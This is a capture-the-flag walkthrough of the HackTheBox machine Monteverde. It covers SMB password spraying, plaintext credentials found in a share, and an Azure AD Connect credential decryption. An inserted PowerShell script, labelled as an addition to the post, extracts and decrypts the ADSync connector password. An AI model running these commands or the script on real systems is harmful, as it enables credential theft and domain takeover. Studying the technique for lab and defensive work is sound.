Monteverde — HackTheBox

y4th0ts
5 min read · Jun 13, 2020

Summary

Monteverde is a medium-rated Windows box created by egre55. It focuses mainly on weak password management and on files containing plaintext credentials. The initial foothold is gained by accessing SMB shares as a user whose password is identical to his username. User access is gained by discovering an XML file in one of the shares that contains a plaintext password. Administrator privileges are obtained by decrypting the Azure AD Connect account password that is stored, encrypted, in its local database.

Reconnaissance

As usual, a scan for open ports and services using nmap is performed. The box exposes the services typical of a domain controller; the ones that matter for this box are SMB, LDAP and RPC, plus WinRM, which is used later with evil-winrm.

command: nmap -sVC -A 10.10.10.172

I tried enumerating shares anonymously with smbmap and smbclient, but had no luck finding anything.

I ran enum4linux to find anything useful and found a few domain users.

command: enum4linux 10.10.10.172

After poking around a little more, I could not find anything else useful. I listed all the users in a file and used GetNPUsers from impacket to attempt to grab an AS-REP hash for any user without Kerberos pre-authentication, but that was also unsuccessful.

for i in $(cat users.txt); do GetNPUsers.py MEGABANK/$i -dc-ip 10.10.10.172 -no-pass; done

Initial Foothold

At this point I was not finding any more information, so I automated SMB login attempts with the Metasploit smb_login module, using the discovered users as both the user list and the password list.

use the auxiliary/scanner/smb/smb_login module to automate the login attempts
set the necessary options: RHOSTS, SMBDomain, the user file, and USER_AS_PASS so each username is tried as its own password
a successful login was found for the user SABatchJobs, whose password is the same as the username

I used the credentials I found to list and access shares and enumerate further.

Several shares were readable. I accessed the users$ share, which contains a directory per user, to look for useful information.

Only mhope's directory has a file in it. I downloaded it and discovered his password inside the XML file.

Gaining User Access

I used the newly found credentials to log in to the machine over WinRM using evil-winrm and grabbed the user.txt flag.

From here I enumerated the programs installed on the machine, looking for anything that is not installed by default, and found Microsoft Azure Active Directory Connect along with a few more Azure AD related directories.

I looked for a version number so I could search for a known vulnerability, but I could not find a file that records the installed version, nor do I know whether one exists. I searched for "Azure active directory exploit" instead and found a few links on decrypting Azure AD Connect credentials.

Gaining Root Access

I focused mainly on this article, which includes a proof of concept that I used to gain administrative access. I downloaded the POC from his github repo, unzipped it, and transferred it to the target machine.

I created a temp directory in C:\ and placed the downloaded files there.

The files are hosted on the attacking machine with Python's SimpleHTTPServer and downloaded on the target with Invoke-WebRequest.

Basically, the exploit logs in to the local ADSync database and queries the information needed to decrypt the stored credential: the keyset_id and instance_id from mms_server_configuration, and the private_configuration_xml and encrypted_configuration from mms_management_agent. The private_configuration_xml holds the domain and username of the account Azure AD Connect uses, while encrypted_configuration holds its password in encrypted form. mcrypt.dll, which was downloaded alongside AdDecrypt.exe and is the same library Azure AD Connect itself ships in its Bin directory, is the module responsible for loading the key set and decrypting the encrypted configuration.

For this attack to succeed, the current working directory must be "C:\Program Files\Microsoft Azure AD Sync\Bin", so that the decryption library can resolve the other assemblies it depends on. From there, the exploit is executed using its full path, 'c:/temp/AdDecrypt.exe -FullSQL' (the -FullSQL switch is for a full SQL Server instance rather than LocalDB):

c:/temp/AdDecrypt.exe -FullSQL
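To make the steps described above concrete, the following is an added PowerShell example that performs the same database queries and decryption by hand with the product's own mcrypt.dll. It is not the PoC's code and not part of the original post. The connection string, the entropy column, the ma_type filter and the KeyManager method names are taken from the public research on this technique and are assumptions here; they may differ on other Azure AD Connect versions. Run it from the Bin directory, for the same dependency reason noted above.

```powershell
# Added example, not from the original write-up or the PoC.
# Reproduces what AdDecrypt.exe -FullSQL does, step by step.
# Assumptions: full SQL Server instance reachable as localhost with Windows auth,
# the "entropy" column and "ma_type" filter, and the KeyManager method names,
# all taken from the public research on this technique.

$binDir = "C:\Program Files\Microsoft Azure AD Sync\Bin"
Set-Location $binDir                               # mcrypt.dll resolves its dependencies from here
Add-Type -Path (Join-Path $binDir "mcrypt.dll")    # the product's own decryption library

# Step 1: open a Windows-authenticated connection to the ADSync database.
$conn = New-Object System.Data.SqlClient.SqlConnection
$conn.ConnectionString = "Server=localhost;Database=ADSync;Trusted_Connection=True"
$conn.Open()

# Step 2: key identifiers from mms_server_configuration.
$cmd = $conn.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$keysetId   = $reader.GetInt32(0)
$instanceId = $reader.GetGuid(1)
$entropy    = $reader.GetGuid(2)
$reader.Close()

# Step 3: the on-premises AD connector's configuration from mms_management_agent.
$cmd = $conn.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config  = $reader.GetString(0)   # plaintext XML: domain and username
$crypted = $reader.GetString(1)   # base64 blob: password, encrypted
$reader.Close()
$conn.Close()

# Step 4: load the key set and decrypt with the KeyManager class from mcrypt.dll.
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instanceId, $keysetId)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

# Step 5: pull the three fields out of the two XML documents.
$domain   = (Select-Xml -Content $config    -XPath "//parameter[@name='forest-login-domain']").Node.InnerXml
$username = (Select-Xml -Content $config    -XPath "//parameter[@name='forest-login-user']").Node.InnerXml
$password = (Select-Xml -Content $decrypted -XPath "//attribute").Node.InnerXml

"Domain:   $domain"
"Username: $username"
"Password: $password"
```

The point worth taking from this is that no vulnerability in Azure AD Connect is being exploited: anyone who can open the ADSync database and load the product's own library can recover the credential, so access to that database is equivalent to holding the connector account's password.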

It successfully decrypts the password of the account Azure AD Connect uses, which on this box is the domain Administrator. That password can now be used with evil-winrm to get an administrative shell and finish off by grabbing the root.txt flag.

Thank you for reading! I would appreciate it a lot if readers could give some feedback and tips on how to get better and what alternatives I should have taken in approaching this box. Have a nice day!
